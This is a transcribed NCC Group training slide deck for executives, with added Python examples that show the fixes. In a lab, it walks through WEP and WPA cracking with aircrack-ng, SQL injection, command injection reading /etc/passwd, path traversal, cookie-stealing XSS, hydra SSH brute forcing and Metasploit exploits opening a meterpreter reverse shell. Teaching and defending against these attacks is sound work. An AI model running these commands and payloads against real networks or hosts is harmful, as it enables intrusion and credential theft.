
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group


  1. Hacking for Executives: Basic Hacks Used by Real World Attackers. North Texas Cyber Security Conference, November 10th, 2017. Tony Cargile and Matt Nash
  2. Agenda • Introductions • Session 1 • Getting the Lab Set Up • Configuring our WiFi Card • Attacking WEP protected routers • Brute forcing WPA protected routers • Finish Up With A Q&A • Session 2 • Enumeration • Web Application Attacks • Brute Force Attacks • Accessing Backdoors • Exploiting Known Vulnerabilities
  3. ~ tony$ whoami • Principal Security Consultant at NCC Group • Austin Office • Specializing in Application Security and Security Development Lifecycle • National conferences on DANE and SDLC • Background in Development • Bachelor of Science in Computer Science from University of Texas at Austin • Born and raised in Fort Worth, but don’t hold that against me
  4. ~ matt$ whoami • Security Consultant at NCC Group • Austin Office • Specializing in Application Security, Infrastructure Assessment, and Forensics • Certified Digital Forensic Investigator and Incident Responder • Background in System Administration • Bachelor of Science in Food & Resource Economics from University of Florida • Born and raised in Florida, sometimes referred to as Florida Man • (only some of the news stories are true)
  5. What Is This Training? • This is not a BlackHat training • No technical experience needed • The purpose of this training is to teach basic attacks and tools to managers and executives in decision-making roles within the security realm. • All the tools and labs are open source and available online
  6. The Lab • Everyone will be constructing their own “hacker lab” within their computer. • The lab will consist of two virtual machines, controlled by VMware Player: • Kali Linux: a common attacker Linux OS • Metasploitable: a purposefully vulnerable Linux OS • This course is designed for Windows, but 100% possible on Macs and Linux
  7. The WiFi Lab • SSID: NCC Lab 1 • WPA password protected • BSSID: 00:1F:33:E5:2C:A1 • Password: ? • SSID: NCC Lab 2 • WEP protected • BSSID: 68:7F:74:C4:D8:64 • Password: ?
  8. Setting Up the Lab
  9. Opening the USB • 3 files • Kali Linux VM (7-zipped) • Metasploitable 2 VM (zipped) • VMware Player Windows installer
  10. VMware Install • First, start by running the VMware installer
  11. VMware Install • Accept the EULA
  12. VMware Install • No need to install the Enhanced Keyboard Driver
  13. VMware Install • Determine whether you want to give VMware your data
  14. VMware Install
  15. VMware Install
  16. Run VMware Player Once Installed • Once installed, on first run it will ask for a license
  17. Extracting the VMs
  18. Extracting the VMs • Extract to an easy-to-find location. • Take note of where you extracted to. • Don’t put it on the USB
  19. Installing 7-Zip • Right-click on the 7-Zip installer and click “Run as administrator”
  20. Installing 7-Zip • Enter the administrator password and click “Yes”
  21. Installing 7-Zip • Click “Install”
  22. Installing 7-Zip
  23. Installing 7-Zip • Open the 7-Zip program and navigate to the folder containing the Kali archive
  24. Installing 7-Zip • Select the Kali archive and click “Extract”
  25. Installing 7-Zip • Choose an extraction location and click “OK”
  26. Extracting the VMs
  27. Opening the VMs
  28. Opening the VMs
  29. Configuring the VMs • This is an important step for two reasons: (1) we need to make sure that our VMs can talk to each other; (2) we need to make sure that we don’t expose our VMs to the world.
  30. Configuring the VMs • Verify that the Network Adapter says “NAT”
  31. Powering On Metasploitable
  32. Powering On Metasploitable
  33. Powering On Metasploitable
  34. Powering On Metasploitable
  35. Installing VMware Tools
  36. Logging Into Metasploitable • Default credentials: • Username: msfadmin • Password: msfadmin
  37. Logged into Metasploitable
  38. Getting the IP Address • INPUT: ifconfig • Note the IP address: we will need it later!
  39. Powering On Kali • You will go through the same steps as when you powered on Metasploitable. • Click “I copied it” • Don’t change the keyboard timeout • Install VMware Tools.
  40. Kali Starting Up
  41. Enable Full Screen
  42. Log Into Kali • Default credentials: • Username: root • Password: toor
  43. Kali on Startup
  44. Opening the Terminal • Unlike Windows, the task bar is at the top • Kali now has the quick start bar on the left • Click the black terminal icon
  45. Getting Kali’s IP Address • COMMAND: ifconfig • Note the IP address: we will need it later!
  46. Wireless Attacks
  47. Connect USB WiFi Adapter to Kali • Plug in the provided USB wireless adapter and click the “Show devices” icon in the top-right
  48. Connect USB WiFi Adapter to Kali • Mouse over the USB icon to display the connected USB device
  49. Connect USB WiFi Adapter to Kali • Right-click on the USB icon and click “Connect (Disconnect from host)”
  50. Connect USB WiFi Adapter to Kali
  51. Verify Kali Sees the WiFi Adapter
  52. Check the Name of the WiFi Interface • Open a terminal window and use the `ip addr` command to list network interfaces • INPUT: ip addr
  53. Place WiFi Interface Into Monitor Mode • Use `airmon-ng` to place the wlan0 interface into “monitor” mode • INPUT: airmon-ng start wlan0
  54. Kill Problematic Processes • Use `airmon-ng` to kill processes which may interfere with wireless capture • INPUT: airmon-ng check kill
  55. Search for Nearby Access Points • Use `airodump-ng` to search for nearby wireless access points • INPUT: airodump-ng wlan0mon
  56. Nearby Wireless Access Points • We see two interesting access points: one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)
  57. Cracking WEP
  58. Nearby Wireless Access Points • We see two interesting access points: one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)
  59. Capturing Wireless Traffic • Use `airodump-ng` to capture traffic to/from the identified WEP-encrypted access point • INPUT: airodump-ng -c 6 --bssid 68:7F:74:C4:D8:64 --ivs -w Desktop/NCC-Lab-2/NCC-Lab-2_ivs wlan0mon
  60. Capturing Wireless Traffic • Actively capturing data to/from the identified WEP-encrypted access point
  61. Capturing Wireless Traffic • Using `aircrack-ng` against the captured wireless data • INPUT: aircrack-ng Desktop/NCC-Lab-2/NCC-Lab-2_ivs-01.ivs
  62. Capturing Wireless Traffic • `aircrack-ng` has cracked the WEP key used to encrypt data to/from this wireless access point
  63. Capturing Wireless Traffic • `aircrack-ng` has cracked the WEP key used to encrypt data to/from this wireless access point
  64. Brute Forcing WPA
  65. Nearby Wireless Access Points • We see two interesting access points: one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)
  66. Capturing Wireless Traffic • Use `airodump-ng` to capture traffic to/from the identified WPA-encrypted access point • INPUT: airodump-ng -c 11 --bssid 00:1F:33:E5:2C:A1 -w Desktop/NCC-Lab-1/NCC-Lab-1 wlan0mon
  67. Capturing Wireless Traffic • Actively capturing data to/from the identified WPA-encrypted access point
  68. Capturing Wireless Traffic • Using `aircrack-ng` against the captured wireless data • INPUT: aircrack-ng -b 00:1F:33:E5:2C:A1 -w /usr/share/wordlists/rockyou.txt Desktop/NCC-Lab-1/NCC-Lab-1-01.cap
  69. Capturing Wireless Traffic • `aircrack-ng` is attempting a brute force attack using the passwords in the “rockyou” wordlist
  70. Capturing Wireless Traffic • `aircrack-ng` has cracked the WPA key used to encrypt data to/from this wireless access point
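The wireless lab hinges on what the survey in `airodump-ng` reveals: a WEP network falls to statistical key recovery, and a WPA network with a wordlist password falls to the dictionary run above. The defensive counterpart is to audit your own survey for networks that still advertise WEP or no encryption. The following added example (my code, not the deck's or NCC Group's) parses text shaped like the access-point table that `airodump-ng --write` exports as CSV and flags the weak ones; the rows are constructed for this example and use the lab's two BSSIDs plus one made-up open network.

```python
"""Flag WEP and open networks in an airodump-ng style CSV survey (added example)."""
import csv
import io

# Constructed sample in the column layout of the access-point section of an
# airodump-ng CSV export. Real exports follow this table with a blank line and
# a second "Station MAC" table, which the parser below stops at.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
68:7F:74:C4:D8:64, 2017-11-10 09:00:01, 2017-11-10 09:05:10,  6,  54, WEP , WEP , OPN,  -40,  120,  9000,   0.  0.  0.  0,  9, NCC Lab 2,
00:1F:33:E5:2C:A1, 2017-11-10 09:00:02, 2017-11-10 09:05:11, 11,  54, WPA2, CCMP, PSK,  -45,  118,     0,   0.  0.  0.  0,  9, NCC Lab 1,
AA:BB:CC:00:11:22, 2017-11-10 09:00:05, 2017-11-10 09:05:09,  1,  54, OPN ,     ,    ,  -70,   40,     0,   0.  0.  0.  0,  5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Privacy values that give no real confidentiality on the air.
WEAK_PRIVACY = {"WEP", "OPN"}


def parse_access_points(text):
    """Return one dict per access point: bssid, essid, channel, privacy."""
    reader = csv.reader(io.StringIO(text))
    header = [h.strip() for h in next(reader)]
    access_points = []
    for raw in reader:
        if not raw or not raw[0].strip():
            break  # blank line ends the AP table; the station table follows
        fields = dict(zip(header, (f.strip() for f in raw)))
        privacy = fields["Privacy"].split()
        access_points.append({
            "bssid": fields["BSSID"],
            "essid": fields["ESSID"],
            "channel": int(fields["channel"]),
            # airodump-ng may list several protocols ("WPA2 WPA"); the first is the strongest
            "privacy": privacy[0] if privacy else "OPN",
        })
    return access_points


def weak_networks(text):
    """(bssid, essid, privacy) for every network advertising WEP or no encryption."""
    return [(ap["bssid"], ap["essid"], ap["privacy"])
            for ap in parse_access_points(text)
            if ap["privacy"] in WEAK_PRIVACY]


if __name__ == "__main__":
    for bssid, essid, privacy in weak_networks(SAMPLE_CSV):
        print(f"{bssid}  {essid!r}: {privacy} - migrate this network to WPA2/WPA3")
```

Run against a real export, the same function gives an inventory of networks to retire; the WPA2 network is not flagged, which is the point of the second lab: WPA2 itself holds, and only the password choice is in play, so the control there is a long passphrase that no wordlist contains.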
  71. Web Application Attacks
  72. Open the Web Browser • Select the orange Firefox ESR icon • Can also be selected by going to Applications
  73. Browse to Metasploitable • Input the IP address of Metasploitable into the URL bar
  74. Welcome to DVWA
  75. Turn on Easy Mode
  76. The Reset Button
  77. SQL Injection • What is it? • How prevalent is it? • How much damage can it cause?
  78. SQL Injection
  79. SQL Injection
  80. SQL Injection • Error messages are great resources for attackers!
  81. SQL Injection • INPUT: ' or 1=1+'
  82. SQL Injection • INPUT: ' UNION ALL SELECT user,password from users where 1=1+'
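Both payloads work because the lookup page glues the typed value straight into its SQL text, so the quote in the input closes the string and the rest is read as SQL. The added example below (my code, not the deck's or DVWA's) shows the same lookup done the vulnerable way and with a parameterised query, against a constructed in-memory SQLite table. The payloads use `' or '1'='1` rather than the slides' exact strings so that they run unchanged on SQLite, which does not use MySQL comment syntax; the mechanism is the same.

```python
"""DVWA-style user lookup: string concatenation versus a bound parameter (added example)."""
import sqlite3

# Constructed sample data; the password column holds placeholder strings, not real hashes.
SAMPLE_USERS = [
    ("1", "admin", "hash-placeholder-1"),
    ("2", "gordonb", "hash-placeholder-2"),
    ("3", "pablo", "hash-placeholder-3"),
]

# Tautology payload in the spirit of slide 81, and a UNION payload in the spirit of slide 82.
TAUTOLOGY = "' or '1'='1"
UNION_PAYLOAD = "' UNION ALL SELECT user_id, password FROM users WHERE '1'='1"


def build_db():
    """In-memory database with the constructed users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return db


def lookup_vulnerable(db, user_id):
    """The 'low security' pattern: the input becomes part of the SQL text."""
    sql = f"SELECT first_name, password FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    """The fix: the driver binds the value, so quotes and keywords stay data."""
    return db.execute(
        "SELECT first_name, password FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    for payload in ("1", TAUTOLOGY, UNION_PAYLOAD):
        print(f"input {payload!r}:")
        print("  vulnerable ->", lookup_vulnerable(db, payload))
        print("  safe       ->", lookup_safe(db, payload))
```

With the tautology, the vulnerable query returns every row and the parameterised one returns nothing, because no `user_id` literally equals the payload string. The UNION payload goes further and pulls the password column into the result set, which is the step that turns a lookup form into a credential dump; the parameterised version is unaffected by it.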
  83. Command Injection • What is it? • How prevalent is it? • How much damage can it cause? • Similar to SQL injection, but instead of injecting into a SQL database, we are injecting into a command run by the web application server.
  84. Command Injection • INPUT: 8.8.8.8
  85. Command Injection
  86. Command Injection • INPUT: 8.8.8.8; ls
  87. Command Injection • INPUT: 8.8.8.8; whoami
  88. Command Injection • INPUT: 8.8.8.8; cat /etc/passwd
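The ping page hands the typed address to a shell, and the shell treats `;` as a command separator, which is all the three payloads above rely on. The added example below (my code, not the deck's or DVWA's) shows that behaviour next to the fix: validate the value as an IP address and run the program with an argument list so that no shell parses user input. `echo` stands in for `ping` so the example runs offline; the injection mechanics are identical.

```python
"""Command injection through a ping form, vulnerable and hardened (added example)."""
import ipaddress
import subprocess


def ping_vulnerable(target):
    """Interpolates user input into a shell command line, as the lab page does."""
    completed = subprocess.run(f"echo PING {target}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def ping_hardened(target):
    """Accepts only an IP literal, then execs the program directly (no shell)."""
    # ValueError for anything that is not an address, e.g. "8.8.8.8; whoami"
    addr = ipaddress.ip_address(target.strip())
    completed = subprocess.run(["echo", "PING", str(addr)],
                               capture_output=True, text=True)
    return completed.stdout


def demo(payload="8.8.8.8; echo INJECTED"):
    """Run one constructed payload through both handlers and report what happened."""
    vulnerable_output = ping_vulnerable(payload)
    try:
        ping_hardened(payload)
        hardened_result = "executed"
    except ValueError as exc:
        hardened_result = f"rejected: {exc}"
    return vulnerable_output, hardened_result


if __name__ == "__main__":
    out, verdict = demo()
    print("vulnerable handler output:\n" + out)
    print("hardened handler:", verdict)
```

The hardened handler does not try to strip `;` or other metacharacters from the input; an allow-list check (is this an IP address at all?) plus an argv-style call closes the hole regardless of which separator or quoting trick the attacker tries.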
  89. Local File Inclusion/Directory Traversal • What is it? • How prevalent is it? • How much damage can it cause?
  90. Local File Inclusion/Directory Traversal
  91. Local File Inclusion/Directory Traversal • INPUT: test.php
  92. Local File Inclusion/Directory Traversal • INPUT: ../../phpinfo.php
  93. Local File Inclusion/Directory Traversal • INPUT: ../../../../../../../../etc/passwd
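Each `../` in the last two inputs climbs one directory, so a page parameter that is joined onto the web root without checking can reach any file the web server can read. The added example below (my code, not the deck's or DVWA's) contrasts that naive join with a reader that canonicalises the final path and refuses anything outside the web root; a temporary directory holding a constructed `test.php` plays the part of the web root.

```python
"""Contained file include versus naive path join (added example)."""
import os
import tempfile


def make_web_root():
    """Constructed web root containing one includable page."""
    root = tempfile.mkdtemp(prefix="dvwa-demo-")
    with open(os.path.join(root, "test.php"), "w") as fh:
        fh.write("<?php echo 'hello from test.php'; ?>\n")
    return root


def include_vulnerable(root, page):
    """Naive join: '../../../../etc/passwd' walks straight out of the root."""
    with open(os.path.join(root, page)) as fh:
        return fh.read()


def include_safe(root, page):
    """Resolve symlinks and '..' first, then insist the result is under root."""
    base = os.path.realpath(root)
    target = os.path.realpath(os.path.join(base, page))
    # commonpath is a path-aware containment test; a plain startswith would
    # accept a sibling directory such as /var/www-private for root /var/www
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to read outside the web root: {page!r}")
    with open(target) as fh:
        return fh.read()


def classify(root, pages):
    """For each page name, 'served' or 'blocked' according to the safe reader."""
    verdicts = {}
    for page in pages:
        try:
            include_safe(root, page)
            verdicts[page] = "served"
        except (PermissionError, FileNotFoundError):
            verdicts[page] = "blocked"
    return verdicts


if __name__ == "__main__":
    root = make_web_root()
    for page, verdict in classify(root, ["test.php", "../../phpinfo.php",
                                         "../../../../../../../../etc/passwd"]).items():
        print(f"{page}: {verdict}")
```

A stricter variant maps page names through an explicit allow-list and never touches the filesystem with user-supplied text at all; the containment check above is the minimum that stops the traversal inputs from the slides.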
  94. Cross Site Scripting • What is it? • How prevalent is it? • How much damage can it cause?
  95. Stored Cross Site Scripting
  96. Stored Cross Site Scripting
  97. Stored Cross Site Scripting • INPUT: <img src="http://bit.ly/2dtWOWN">
  98. Stored Cross Site Scripting
  99. Stored Cross Site Scripting • INPUT: <script>alert(document.cookie);</script>
  100. Stored Cross Site Scripting
  101. Stored Cross Site Scripting • DON’T DO THIS: <script>document.location="https://nccgroup.trust";</script>
  102. Reflected Cross Site Scripting
  103. Reflected Cross Site Scripting
  104. Reflected Cross Site Scripting
  105. Reflected Cross Site Scripting
  106. Reflected Cross Site Scripting
  107. Reflected Cross Site Scripting
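Stored and reflected XSS differ only in where the payload comes from (the guestbook database or the request itself); in both cases the page writes untrusted text into HTML without encoding it, so the browser sees a new tag. The added example below (my code, not the deck's or DVWA's) renders a constructed guestbook entry with and without HTML encoding and uses Python's HTML parser to show which tags a browser would actually see in each rendering, for both the `<img>` and `<script>` payloads from the stored-XSS slides.

```python
"""Output encoding as the fix for stored and reflected XSS (added example)."""
import html
from html.parser import HTMLParser

# Minimal guestbook row template; the two renderers differ only in encoding.
TEMPLATE = '<div class="entry"><b>{name}</b>: {message}</div>'

# Constructed payloads in the shape of the slides' inputs.
IMG_PAYLOAD = '<img src="http://bit.ly/2dtWOWN">'
SCRIPT_PAYLOAD = "<script>alert(document.cookie);</script>"


def render_vulnerable(name, message):
    """Writes the visitor's text straight into the page."""
    return TEMPLATE.format(name=name, message=message)


def render_safe(name, message):
    """HTML-encodes at the point of output, so '<' becomes '&lt;' and stays text."""
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           message=html.escape(message, quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment):
    """Start tags a browser's parser would see in the rendered fragment."""
    collector = _TagCollector()
    collector.feed(fragment)
    return collector.tags


if __name__ == "__main__":
    for payload in (IMG_PAYLOAD, SCRIPT_PAYLOAD):
        print("payload:", payload)
        print("  vulnerable render sees tags:", tags_in(render_vulnerable("visitor", payload)))
        print("  safe render sees tags:      ", tags_in(render_safe("visitor", payload)))
```

Encoding at output is the control that removes the vulnerability. Two further mitigations shrink the damage from slide 99's payload if a bug slips through: marking the session cookie `HttpOnly` keeps it out of `document.cookie`, and a Content-Security-Policy that disallows inline scripts stops the injected `<script>` block from executing.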
  108. Network Penetration Attacks
  109. Enumeration • INPUT: nmap -sV -p- 192.168.132.128
  110. Enumeration
  111. Brute Forcing Passwords • INPUT: hydra -l sys -P /usr/share/john/password.lst -t 4 192.168.132.128 ssh
  112. Brute Forcing Passwords
  113. Brute Forcing Passwords • INPUT: ssh sys@192.168.132.128
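A password-guessing run like the `hydra` command above is loud on the target: `sshd` logs one "Failed password" line per attempt, so the defender's view is a burst of failures from a single source, sometimes followed by an "Accepted password" from the same address. The added example below (my code, not the deck's) parses constructed `auth.log` lines in that format, groups failures by source inside a one-minute window, and reports sources that cross a threshold; the addresses echo the lab network but the lines themselves are made up.

```python
"""Detect SSH password brute forcing from sshd log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in syslog format: six failures then a success from one
# source, and a single unrelated failure from another.
SAMPLE_LOG = """\
Nov 10 14:02:01 metasploitable sshd[4011]: Failed password for sys from 192.168.132.129 port 40212 ssh2
Nov 10 14:02:02 metasploitable sshd[4013]: Failed password for sys from 192.168.132.129 port 40214 ssh2
Nov 10 14:02:03 metasploitable sshd[4015]: Failed password for sys from 192.168.132.129 port 40216 ssh2
Nov 10 14:02:04 metasploitable sshd[4017]: Failed password for sys from 192.168.132.129 port 40218 ssh2
Nov 10 14:02:05 metasploitable sshd[4019]: Failed password for sys from 192.168.132.129 port 40220 ssh2
Nov 10 14:02:06 metasploitable sshd[4021]: Failed password for sys from 192.168.132.129 port 40222 ssh2
Nov 10 14:02:09 metasploitable sshd[4031]: Accepted password for sys from 192.168.132.129 port 40230 ssh2
Nov 10 14:03:00 metasploitable sshd[4040]: Failed password for msfadmin from 192.168.132.50 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$"
)


def parse_events(text, year=2017):
    """(timestamp, result, user, source) for every sshd password line; syslog has no year."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match:
            ts = datetime.strptime(match["ts"], "%b %d %H:%M:%S").replace(year=year)
            events.append((ts, match["result"], match["user"], match["src"]))
    return events


def brute_force_sources(text, threshold=5, window=timedelta(minutes=1)):
    """Sources with at least `threshold` failures inside one window, noting a later success."""
    failures = defaultdict(list)
    succeeded = set()
    for ts, result, _user, src in parse_events(text):
        if result == "Failed":
            failures[src].append(ts)
        else:
            succeeded.add(src)
    flagged = {}
    for src, times in failures.items():
        times.sort()
        for i, start in enumerate(times):  # slide the window over each failure
            count = sum(1 for t in times[i:] if t - start <= window)
            if count >= threshold:
                flagged[src] = {"failures": count, "success_after": src in succeeded}
                break
    return flagged


if __name__ == "__main__":
    for src, info in brute_force_sources(SAMPLE_LOG).items():
        print(f"{src}: {info['failures']} failures in one minute; "
              f"later login succeeded: {info['success_after']}")
```

A source that is flagged and then logs a success is the case to escalate: the guessing worked. The same logic also argues for the preventive controls that make the hydra run pointless in the first place: key-based authentication, or at least lockout and rate limiting on password logins.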
  114. Running Metasploit • INPUT: msfconsole
  115. Enumeration
  116. Loading an Exploit • INPUT: use exploit/unix/ftp/vsftpd_234_backdoor
  117. Loading an Exploit • INPUT: show options • INPUT: set RHOST 192.168.132.128
  118. Running an Exploit • INPUT: run
  119. Running an Exploit • INPUT: id • INPUT: whoami • INPUT: ls
  120. Loading an Exploit • INPUT: use exploit/unix/misc/distcc_exec
  121. Loading an Exploit • INPUT: show options • INPUT: set RHOST 192.168.132.128
  122. Running an Exploit • INPUT: run • INPUT: id • INPUT: ls
  123. Exploiting Java RMI Using Meterpreter • INPUT: use exploit/multi/misc/java_rmi_server • INPUT: show options
  124. Exploiting Java RMI Using Meterpreter • INPUT: set RHOST 192.168.132.128 • INPUT: set LHOST 192.168.132.129 • INPUT: set PAYLOAD java/meterpreter/reverse_tcp • INPUT: run
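All three Metasploit modules above work against services whose version or mere presence is already enough to know they are exploitable, which is exactly what the `nmap -sV` enumeration step reveals. The defender's version of that step is to run the same scan against your own hosts and match the service banners against a list of known-bad versions. The added example below (my code, not the deck's) does that over constructed text in the shape of `nmap -sV` output, with a rule list limited to the three services the deck exploits.

```python
"""Match nmap -sV service lines against known-exploitable versions (added example)."""
import re

# Constructed scan text in the layout nmap prints for -sV; the lines are made up
# for this example and stand in for the deck's scan of 192.168.132.128.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.132.128
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
1099/tcp open  java-rmi    GNU Classpath grmiregistry
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# (pattern applied to the VERSION column, note naming the deck's module for that service)
KNOWN_BAD = [
    (re.compile(r"^vsftpd 2\.3\.4\b"),
     "vsftpd 2.3.4 ships with a backdoor (exploit/unix/ftp/vsftpd_234_backdoor); upgrade"),
    (re.compile(r"^distccd\b"),
     "exposed distccd allows remote command execution (exploit/unix/misc/distcc_exec); remove or firewall"),
    (re.compile(r"^GNU Classpath grmiregistry"),
     "exposed Java RMI registry (exploit/multi/misc/java_rmi_server); restrict access"),
]


def parse_scan(text):
    """(port, service, version) for each open port line in nmap -sV output."""
    services = []
    for line in text.splitlines():
        match = PORT_RE.match(line)
        if match and match["state"] == "open":
            services.append((int(match["port"]), match["service"], match["version"].strip()))
    return services


def findings(text):
    """(port, note) for every open service whose banner matches a known-bad rule."""
    results = []
    for port, _service, version in parse_scan(text):
        for pattern, note in KNOWN_BAD:
            if pattern.search(version):
                results.append((port, note))
                break
    return results


if __name__ == "__main__":
    for port, note in findings(SAMPLE_SCAN):
        print(f"port {port}: {note}")
```

Three of the five open ports in the sample match a rule, which mirrors the deck: each of those services gives the attacker a shell with no credentials at all. The rule list here is deliberately tiny; in practice the banner-to-vulnerability mapping comes from a vulnerability scanner or a CPE-to-CVE feed, but the workflow (scan yourself, match versions, patch or remove) is the same.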
  125. Q&A
  126. Contact Us • Mitchell Merrick • Strategic Account Manager • Mitchell.Merrick@nccgroup.trust • (512) 431-6213 • Tony Cargile • Principal Security Consultant • Tony.Cargile@nccgroup.trust • Matt Nash • Security Consultant • Matt.Nash@nccgroup.trust • www.nccgroup.trust • https://www.linkedin.com/company/ncc-group/ • https://twitter.com/NCCGroupplc • https://www.facebook.com/NCCGroupplc/ • https://plus.google.com/+nccgroup
  127. Office Locations • Europe: Manchester (Head Office), Basingstoke, Belgium, Cheltenham, Denmark, Edinburgh, Germany, Glasgow, Leatherhead, Leeds, Lithuania, London, Luxembourg, Milton Keynes, Spain, Sweden, Switzerland, The Netherlands • USA: Atlanta, GA; Austin, TX; Chicago, IL; New York, NY; San Francisco, CA; Seattle, WA; Sunnyvale, CA • Australia: Sydney • Canada: Kitchener, ON • Middle East: Dubai
